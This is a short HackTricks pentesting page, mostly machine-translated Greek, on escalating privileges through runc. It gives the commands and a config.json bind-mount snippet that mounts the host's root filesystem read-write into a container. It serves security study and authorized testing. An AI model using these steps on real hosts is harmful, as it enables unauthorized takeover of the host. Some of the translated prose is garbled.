RunC Privilege Escalation

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Βασικές πληροφορίες

Εάν θέλετε να μάθετε περισσότερα για το runc, ελέγξτε την παρακάτω σελίδα:

page2375, 2376 Pentesting Docker

Εκμετάλλευση Προνομίων (PE)

Εάν διαπιστώσετε ότι το runc είναι εγκατεστημένο στον κεντρικό υπολογιστή, μπορείτε να εκτελέσετε έναν container που προσαρτά τον φάκελο root / του κεντρικού υπολογιστή.

runc -help #Get help and see if runc is intalled
runc spec #This will create the config.json file in your current folder

Inside the "mounts" section of the create config.json add the following lines:
{
"type": "bind",
"source": "/",
"destination": "/",
"options": [
"rbind",
"rw",
"rprivate"
]
},

#Once you have modified the config.json file, create the folder rootfs in the same directory
mkdir rootfs

# Finally, start the container
# The root folder is the one from the host
runc run demo

Αυτό δεν θα λειτουργήσει πάντα, καθώς η προεπιλεγμένη λειτουργία του runc είναι να τρέχει ως root, οπότε η εκτέλεσή του ως μη προνομιούχος χρήστης απλά δεν μπορεί να λειτουργήσει (εκτός αν έχετε μια ριζοστατική ρύθμιση). Η καθορισμένη ρύθμιση χωρίς ρίζα δεν είναι γενικά μια καλή ιδέα, επειδή υπάρχουν αρκετοί περιορισμοί μέσα στους ριζοστατικούς δοχείους που δεν ισχύουν έξω από τους ριζοστατικούς δοχείους.

Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Last updated